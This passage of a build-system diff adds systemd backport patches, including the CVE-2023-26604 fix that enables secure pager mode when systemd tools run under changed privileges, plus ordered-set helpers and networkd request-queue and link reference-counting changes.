+- assert_se(r >= 0);
++ assert_se(sd_login_monitor_new("session", &m) == 0);
+
+- for (n = 0; n < 5; n++) {
++ for (unsigned n = 0; n < 5; n++) {
+ struct pollfd pollfd = {};
+ usec_t timeout, nw;
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
new file mode 100644
index 0000000000..f02f62b772
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
@@ -0,0 +1,182 @@
+From 0a42426d797406b4b01a0d9c13bb759c2629d108 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 7 Oct 2020 11:15:05 +0200
+Subject: [PATCH] pager: make pager secure when under euid is changed or
+ explicitly requested
+
+The variable is renamed to SYSTEMD_PAGERSECURE (because it's not just about
+less now), and we automatically enable secure mode in certain cases, but not
+otherwise.
+
+This approach is more nuanced, but should provide a better experience for
+users:
+
+- Previusly we would set LESSSECURE=1 and trust the pager to make use of
+ it. But this has an effect only on less. We need to not start pagers which
+ are insecure when in secure mode. In particular more is like that and is a
+ very popular pager.
+
+- We don't enable secure mode always, which means that those other pagers can
+ reasonably used.
+
+- We do the right thing by default, but the user has ultimate control by
+ setting SYSTEMD_PAGERSECURE.
+
+Fixes #5666.
+
+v2:
+- also check $PKEXEC_UID
+
+v3:
+- use 'sd_pid_get_owner_uid() != geteuid()' as the condition
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/0a42426d797406b4b01a0d9c13bb759c2629d108]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml | 30 +++++++++++++++----
+ src/shared/pager.c | 63 ++++++++++++++++++++++++++-------------
+ 2 files changed, 66 insertions(+), 27 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index c52511c..049e9f7 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -65,12 +65,30 @@
+ </varlistentry>
+
+ <varlistentry id='lesssecure'>
+- <term><varname>$SYSTEMD_LESSSECURE</varname></term>
+-
+- <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
+- variable when invoking the pager, which controls the "secure" mode of less (which disables commands
+- such as <literal>|</literal> which allow to easily shell out to external command lines). By default
+- less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++ <term><varname>$SYSTEMD_PAGERSECURE</varname></term>
++
++ <listitem><para>Takes a boolean argument. When true, the "secure" mode of the pager is enabled; if
++ false, disabled. If <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, secure mode is enabled
++ if the effective UID is not the same as the owner of the login session, see <citerefentry
++ project='man-pages'><refentrytitle>geteuid</refentrytitle><manvolnum>2</manvolnum></citerefentry> and
++ <citerefentry><refentrytitle>sd_pid_get_owner_uid</refentrytitle><manvolnum>3</manvolnum></citerefentry>.
++ In secure mode, <option>LESSSECURE=1</option> will be set when invoking the pager, and the pager shall
++ disable commands that open or create new files or start new subprocesses. When
++ <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, pagers which are not known to implement
++ secure mode will not be used. (Currently only
++ <citerefentry><refentrytitle>less</refentrytitle><manvolnum>1</manvolnum></citerefentry> implements
++ secure mode.)</para>
++
++ <para>Note: when commands are invoked with elevated privileges, for example under <citerefentry
++ project='man-pages'><refentrytitle>sudo</refentrytitle><manvolnum>8</manvolnum></citerefentry> or
++ <citerefentry
++ project='die-net'><refentrytitle>pkexec</refentrytitle><manvolnum>1</manvolnum></citerefentry>, care
++ must be taken to ensure that unintended interactive features are not enabled. "Secure" mode for the
++ pager may be enabled automatically as describe above. Setting <varname>SYSTEMD_PAGERSECURE=0</varname>
++ or not removing it from the inherited environment allows the user to invoke arbitrary commands. Note
++ that if the <varname>$SYSTEMD_PAGER</varname> or <varname>$PAGER</varname> variables are to be
++ honoured, <varname>$SYSTEMD_PAGERSECURE</varname> must be set too. It might be reasonable to completly
++ disable the pager using <option>--no-pager</option> instead.</para></listitem>
+ </varlistentry>
+
+ <varlistentry id='colors'>
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a3b6576..a72d9ea 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -8,6 +8,8 @@
+ #include <sys/prctl.h>
+ #include <unistd.h>
+
++#include "sd-login.h"
++
+ #include "copy.h"
+ #include "env-util.h"
+ #include "fd-util.h"
+@@ -164,25 +166,42 @@ int pager_open(PagerFlags flags) {
+ }
+
+ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
+- * privileged stuff. */
+- r = getenv_bool("SYSTEMD_LESSSECURE");
+- if (r == 0) { /* Remove env var if off */
+- if (unsetenv("LESSSECURE") < 0) {
+- log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
+- _exit(EXIT_FAILURE);
+- }
+- } else {
+- /* Set env var otherwise */
++ * privileged stuff. If the user set $SYSTEMD_PAGERSECURE, trust their configuration of the
++ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
++ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
++ * know to be good. */
++ int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++ bool trust_pager = use_secure_mode >= 0;
++ if (use_secure_mode == -ENXIO) {
++ uid_t uid;
++
++ r = sd_pid_get_owner_uid(0, &uid);
+ if (r < 0)
+- log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++ log_debug_errno(r, "sd_pid_get_owner_uid() failed, enabling pager secure mode: %m");
+
+- if (setenv("LESSSECURE", "1", 1) < 0) {
+- log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
+- _exit(EXIT_FAILURE);
+- }
++ use_secure_mode = r < 0 || uid != geteuid();
++
++ } else if (use_secure_mode < 0) {
++ log_warning_errno(use_secure_mode, "Unable to parse $SYSTEMD_PAGERSECURE, assuming true: %m");
++ use_secure_mode = true;
+ }
+
+- if (pager_args) {
++ /* We generally always set variables used by less, even if we end up using a different pager.
++ * They shouldn't hurt in any case, and ideally other pagers would look at them too. */
++ if (use_secure_mode)
++ r = setenv("LESSSECURE", "1", 1);
++ else
++ r = unsetenv("LESSSECURE");
++ if (r < 0) {
++ log_error_errno(errno, "Failed to adjust environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++
++ if (trust_pager && pager_args) { /* The pager config might be set globally, and we cannot
++ * know if the user adjusted it to be appropriate for the
++ * secure mode. Thus, start the pager specified through
++ * envvars only when $SYSTEMD_PAGERSECURE was explicitly set
++ * as well. */
+ r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -194,13 +213,14 @@ int pager_open(PagerFlags flags) {
+ "Failed to execute '%s', using fallback pagers: %m", pager_args[0]);
+ }
+
+- /* Debian's alternatives command for pagers is
+- * called 'pager'. Note that we do not call
+- * sensible-pagers here, since that is just a
+- * shell script that implements a logic that
+- * is similar to this one anyway, but is
+- * Debian-specific. */
++ /* Debian's alternatives command for pagers is called 'pager'. Note that we do not call
++ * sensible-pagers here, since that is just a shell script that implements a logic that is
++ * similar to this one anyway, but is Debian-specific. */
+ FOREACH_STRING(exe, "pager", "less", "more") {
++ /* Only less implements secure mode right now. */
++ if (use_secure_mode && !streq(exe, "less"))
++ continue;
++
+ r = loop_write(exe_name_pipe[1], exe, strlen(exe) + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -211,6 +231,7 @@ int pager_open(PagerFlags flags) {
+ "Failed to execute '%s', using next fallback pager: %m", exe);
+ }
+
++ /* Our builtin is also very secure. */
+ r = loop_write(exe_name_pipe[1], "(built-in)", strlen("(built-in)") + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
new file mode 100644
index 0000000000..bc6b0a91c2
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
@@ -0,0 +1,32 @@
+From b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Thu, 15 Oct 2020 10:54:48 +0200
+Subject: [PATCH] pager: lets check SYSTEMD_PAGERSECURE with secure_getenv()
+
+I can't think of any real vulnerability about this, but it still feels
+better to check a variable with "secure" in its name with
+secure_getenv() rather than plain getenv().
+
+Paranoia FTW!
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17359/commits/b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/shared/pager.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a72d9ea..250519c 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -170,7 +170,7 @@ int pager_open(PagerFlags flags) {
+ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
+ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
+ * know to be good. */
+- int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++ int use_secure_mode = getenv_bool_secure("SYSTEMD_PAGERSECURE");
+ bool trust_pager = use_secure_mode >= 0;
+ if (use_secure_mode == -ENXIO) {
+ uid_t uid;
diff --git a/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
new file mode 100644
index 0000000000..86d9b0499a
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
@@ -0,0 +1,78 @@
+From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 1 Sep 2020 12:42:35 +0200
+Subject: [PATCH] basic: pass allocation info for ordered_set_new() and
+ introduce ordered_set_ensure_put()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.c | 21 +++++++++++++++++++++
+ src/basic/ordered-set.h | 18 +++++++-----------
+ 2 files changed, 28 insertions(+), 11 deletions(-)
+
+diff --git a/src/basic/ordered-set.c b/src/basic/ordered-set.c
+index 7fdb47e064..fb82c17b5a 100644
+--- a/src/basic/ordered-set.c
++++ b/src/basic/ordered-set.c
+@@ -4,6 +4,27 @@
+ #include "ordered-set.h"
+ #include "strv.h"
+
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
++ if (*s)
++ return 0;
++
++ *s = _ordered_set_new(ops HASHMAP_DEBUG_PASS_ARGS);
++ if (!*s)
++ return -ENOMEM;
++
++ return 0;
++}
++
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS) {
++ int r;
++
++ r = _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_PASS_ARGS);
++ if (r < 0)
++ return r;
++
++ return ordered_set_put(*s, p);
++}
++
+ int ordered_set_consume(OrderedSet *s, void *p) {
+ int r;
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a42a57eb49..2c241a808b 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -7,20 +7,16 @@
+
+ typedef struct OrderedSet OrderedSet;
+
+-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) {
+- return (OrderedSet*) ordered_hashmap_new(ops);
++static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
++ return (OrderedSet*) internal_ordered_hashmap_new(ops HASHMAP_DEBUG_PASS_ARGS);
+ }
++#define ordered_set_new(ops) _ordered_set_new(ops HASHMAP_DEBUG_SRC_ARGS)
+
+-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) {
+- if (*s)
+- return 0;
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_SRC_ARGS)
+
+- *s = ordered_set_new(ops);
+- if (!*s)
+- return -ENOMEM;
+-
+- return 0;
+-}
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key HASHMAP_DEBUG_SRC_ARGS)
+
+ static inline OrderedSet* ordered_set_free(OrderedSet *s) {
+ return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s);
diff --git a/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
new file mode 100644
index 0000000000..42b6e05b55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
@@ -0,0 +1,35 @@
+From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 26 Apr 2021 23:52:40 +0900
+Subject: [PATCH] ordered-set: introduce
+ ordered_set_clear/free_with_destructor()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.h | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a377f20b1f..64df41766f 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s);
+ #define ORDERED_SET_FOREACH(e, s, i) \
+ for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); )
+
++#define ordered_set_clear_with_destructor(s, f) \
++ ({ \
++ OrderedSet *_s = (s); \
++ void *_item; \
++ while ((_item = ordered_set_steal_first(_s))) \
++ f(_item); \
++ _s; \
++ })
++#define ordered_set_free_with_destructor(s, f) \
++ ordered_set_free(ordered_set_clear_with_destructor(s, f))
++
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free);
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free);
+
diff --git a/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
new file mode 100644
index 0000000000..06c523834d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
@@ -0,0 +1,285 @@
+From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 7 May 2021 15:39:16 +0900
+Subject: [PATCH] network: add skeleton of request queue
+
+This will be used in later commits.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/meson.build | 2 +
+ src/network/networkd-link.c | 20 +++++-
+ src/network/networkd-manager.c | 7 ++
+ src/network/networkd-manager.h | 2 +
+ src/network/networkd-queue.c | 121 +++++++++++++++++++++++++++++++++
+ src/network/networkd-queue.h | 42 ++++++++++++
+ 6 files changed, 192 insertions(+), 2 deletions(-)
+ create mode 100644 src/network/networkd-queue.c
+ create mode 100644 src/network/networkd-queue.h
+
+diff --git a/src/network/meson.build b/src/network/meson.build
+index 4fca3106dc..a8b9232e64 100644
+--- a/src/network/meson.build
++++ b/src/network/meson.build
+@@ -105,6 +105,8 @@ sources = files('''
+ networkd-network.h
+ networkd-nexthop.c
+ networkd-nexthop.h
++ networkd-queue.c
++ networkd-queue.h
+ networkd-route.c
+ networkd-route.h
+ networkd-routing-policy-rule.c
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 34359b2541..2f33305a27 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -30,6 +30,7 @@
+ #include "networkd-manager.h"
+ #include "networkd-ndisc.h"
+ #include "networkd-neighbor.h"
++#include "networkd-queue.h"
+ #include "networkd-radv.h"
+ #include "networkd-routing-policy-rule.h"
+ #include "networkd-wifi.h"
+
+@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for
+ if (r < 0)
+ return r;
+
++ link_drop_requests(link);
++
+ r = link_drop_config(link);
+ if (r < 0)
+ return r;
+@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) {
+ return r;
+ }
+
++ link_drop_requests(link);
++
+ r = link_drop_config(link);
+ if (r < 0)
+ return r;
+diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c
+index 562ce5ca54..fd576169a9 100644
+--- a/src/network/networkd-manager.c
++++ b/src/network/networkd-manager.c
+@@ -34,6 +34,7 @@
+ #include "networkd-manager-bus.h"
+ #include "networkd-manager.h"
+ #include "networkd-network-bus.h"
++#include "networkd-queue.h"
+ #include "networkd-speed-meter.h"
+ #include "ordered-set.h"
+ #include "path-util.h"
+@@ -406,6 +407,10 @@ int manager_new(Manager **ret) {
+ if (r < 0)
+ return r;
+
++ r = sd_event_add_post(m->event, NULL, manager_process_requests, m);
++ if (r < 0)
++ return r;
++
+ r = manager_connect_rtnl(m);
+ if (r < 0)
+ return r;
+@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) {
+
+ free(m->state_file);
+
++ m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free);
++
+ while ((a = hashmap_first_key(m->dhcp6_prefixes)))
+ (void) dhcp6_prefix_remove(m, a);
+ m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes);
+diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h
+index 301b97c1a1..26e8802871 100644
+--- a/src/network/networkd-manager.h
++++ b/src/network/networkd-manager.h
+@@ -91,6 +91,8 @@ struct Manager {
+ usec_t speed_meter_usec_old;
+
+ bool dhcp4_prefix_root_cannot_set_table;
++
++ OrderedSet *request_queue;
+ };
+
+ int manager_new(Manager **ret);
+diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c
+new file mode 100644
+index 0000000000..24bb2c845d
+--- /dev/null
++++ b/src/network/networkd-queue.c
+@@ -0,0 +1,121 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++
++#include "networkd-address.h"
++#include "networkd-manager.h"
++#include "networkd-neighbor.h"
++#include "networkd-nexthop.h"
++#include "networkd-route.h"
++#include "networkd-routing-policy-rule.h"
++#include "networkd-queue.h"
++
++static void request_free_object(RequestType type, void *object) {
++ switch(type) {
++ default:
++ assert_not_reached("invalid request type.");
++ }
++}
++
++Request *request_free(Request *req) {
++ if (!req)
++ return NULL;
++
++ if (req->on_free)
++ req->on_free(req);
++ if (req->consume_object)
++ request_free_object(req->type, req->object);
++ if (req->link && req->link->manager)
++ ordered_set_remove(req->link->manager->request_queue, req);
++ link_unref(req->link);
++
++ return mfree(req);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free);
++
++void request_drop(Request *req) {
++ if (req->message_counter)
++ (*req->message_counter)--;
++
++ request_free(req);
++}
++
++int link_queue_request(
++ Link *link,
++ RequestType type,
++ void *object,
++ bool consume_object,
++ unsigned *message_counter,
++ link_netlink_message_handler_t netlink_handler,
++ Request **ret) {
++
++ _cleanup_(request_freep) Request *req = NULL;
++ int r;
++
++ assert(link);
++ assert(link->manager);
++ assert(type >= 0 && type < _REQUEST_TYPE_MAX);
++ assert(object);
++ assert(netlink_handler);
++
++ req = new(Request, 1);
++ if (!req) {
++ if (consume_object)
++ request_free_object(type, object);
++ return -ENOMEM;
++ }
++
++ *req = (Request) {
++ .link = link,
++ .type = type,
++ .object = object,
++ .consume_object = consume_object,
++ .message_counter = message_counter,
++ .netlink_handler = netlink_handler,
++ };
++
++ link_ref(link);
++
++ r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req);
++ if (r < 0)
++ return r;
++
++ if (req->message_counter)
++ (*req->message_counter)++;
++
++ if (ret)
++ *ret = req;
++
++ TAKE_PTR(req);
++ return 0;
++}
++
++int manager_process_requests(sd_event_source *s, void *userdata) {
++ Manager *manager = userdata;
++ int r;
++
++ assert(manager);
++
++ for (;;) {
++ bool processed = false;
++ Request *req;
++ Iterator i;
++ ORDERED_SET_FOREACH(req, manager->request_queue, i) {
++ switch(req->type) {
++ default:
++ return -EINVAL;
++ }
++ if (r < 0)
++ link_enter_failed(req->link);
++ if (r > 0) {
++ ordered_set_remove(manager->request_queue, req);
++ request_free(req);
++ processed = true;
++ }
++ }
++
++ if (!processed)
++ break;
++ }
++
++ return 0;
++}
+diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h
+new file mode 100644
+index 0000000000..4558ae548f
+--- /dev/null
++++ b/src/network/networkd-queue.h
+@@ -0,0 +1,42 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++#pragma once
++
++#include "sd-event.h"
++
++#include "networkd-link.h"
++
++typedef struct Request Request;
++
++typedef int (*request_after_configure_handler_t)(Request*, void*);
++typedef void (*request_on_free_handler_t)(Request*);
++
++typedef enum RequestType {
++ _REQUEST_TYPE_MAX,
++ _REQUEST_TYPE_INVALID = -EINVAL,
++} RequestType;
++
++typedef struct Request {
++ Link *link;
++ RequestType type;
++ bool consume_object;
++ void *object;
++ void *userdata;
++ unsigned *message_counter;
++ link_netlink_message_handler_t netlink_handler;
++ request_after_configure_handler_t after_configure;
++ request_on_free_handler_t on_free;
++} Request;
++
++Request *request_free(Request *req);
++void request_drop(Request *req);
++
++int link_queue_request(
++ Link *link,
++ RequestType type,
++ void *object,
++ bool consume_object,
++ unsigned *message_counter,
++ link_netlink_message_handler_t netlink_handler,
++ Request **ret);
++
++int manager_process_requests(sd_event_source *s, void *userdata);
diff --git a/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
new file mode 100644
index 0000000000..4c402e7e55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
@@ -0,0 +1,50 @@
+From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:32:57 +0900
+Subject: [PATCH] network: also drop requests when link enters linger state
+
+Otherwise, if link is removed, several references to the link in remain
+exist in requests.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 24 +++++++++++++-----------
+ 1 file changed, 13 insertions(+), 11 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 67d01ac44d..b56c232eca 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
++static void link_drop_requests(Link *link) {
++ Request *req;
++ Iterator i;
++
++ assert(link);
++ assert(link->manager);
++
++ ORDERED_SET_FOREACH(req, link->manager->request_queue, i)
++ if (req->link == link)
++ request_drop(req);
++}
++
+ void link_drop(Link *link) {
+ if (!link)
+ return;
+@@ -1782,6 +1793,8 @@ void link_drop(Link *link) {
+ /* Drop all references from other links and manager. Note that async netlink calls may have
+ * references to the link, and they will be dropped when we receive replies. */
+
++ link_drop_requests(link);
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+--
+2.17.1
+
diff --git a/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
new file mode 100644
index 0000000000..a186bb4095
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
@@ -0,0 +1,278 @@
+From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 14 May 2021 15:58:15 +0900
+Subject: [PATCH] network: fix Link reference counter issue
+
+Previously, when link_new() fails, `link_unref()` was called, so,
+`Manager::links` may become dirty.
+This introduces `link_drop_or_unref()` and it will be called on
+failure.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 240 ++++++++++++++++++------------------
+ 1 file changed, 122 insertions(+), 118 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index b56c232eca..d493afda4c 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -540,109 +540,6 @@ static int link_update_flags(Link *link,
+ return 0;
+ }
+
+-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
+- _cleanup_(link_unrefp) Link *link = NULL;
+- uint16_t type;
+- const char *ifname, *kind = NULL;
+- int r, ifindex;
+- unsigned short iftype;
+-
+- assert(manager);
+- assert(message);
+- assert(ret);
+-
+- /* check for link kind */
+- r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
+- if (r == 0) {
+- (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind);
+- r = sd_netlink_message_exit_container(message);
+- if (r < 0)
+- return r;
+- }
+-
+- r = sd_netlink_message_get_type(message, &type);
+- if (r < 0)
+- return r;
+- else if (type != RTM_NEWLINK)
+- return -EINVAL;
+-
+- r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
+- if (r < 0)
+- return r;
+- else if (ifindex <= 0)
+- return -EINVAL;
+-
+- r = sd_rtnl_message_link_get_type(message, &iftype);
+- if (r < 0)
+- return r;
+-
+- r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname);
+- if (r < 0)
+- return r;
+-
+- link = new(Link, 1);
+- if (!link)
+- return -ENOMEM;
+-
+- *link = (Link) {
+- .n_ref = 1,
+- .manager = manager,
+- .state = LINK_STATE_PENDING,
+- .ifindex = ifindex,
+- .iftype = iftype,
+-
+- .n_dns = (unsigned) -1,
+- .dns_default_route = -1,
+- .llmnr = _RESOLVE_SUPPORT_INVALID,
+- .mdns = _RESOLVE_SUPPORT_INVALID,
+- .dnssec_mode = _DNSSEC_MODE_INVALID,
+- .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
+- };
+-
+- link->ifname = strdup(ifname);
+- if (!link->ifname)
+- return -ENOMEM;
+-
+- if (kind) {
+- link->kind = strdup(kind);
+- if (!link->kind)
+- return -ENOMEM;
+- }
+-
+- r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex);
+- if (r < 0)
+- log_link_debug_errno(link, r, "New device has no master, continuing without");
+-
+- r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
+- if (r < 0)
+- log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
+-
+- if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- r = hashmap_ensure_allocated(&manager->links, NULL);
+- if (r < 0)
+- return r;
+-
+- r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
+- if (r < 0)
+- return r;
+-
+- r = link_update_flags(link, message, false);
+- if (r < 0)
+- return r;
+-
+- *ret = TAKE_PTR(link);
+-
+- return 0;
+-}
+-
+ void link_ntp_settings_clear(Link *link) {
+ link->ntp = strv_free(link->ntp);
+ }
+@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin
+ request_drop(req);
+ }
+
+-void link_drop(Link *link) {
++Link *link_drop(Link *link) {
+ if (!link)
+- return;
++ return NULL;
+
+ assert(link->manager);
+
+@@ -2057,7 +1954,7 @@ void link_drop(Link *link) {
+
+ /* The following must be called at last. */
+ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+- link_unref(link);
++ return link_unref(link);
+ }
+
+ static int link_joined(Link *link) {
+@@ -3295,6 +3192,112 @@ ipv4ll_address_fail:
+
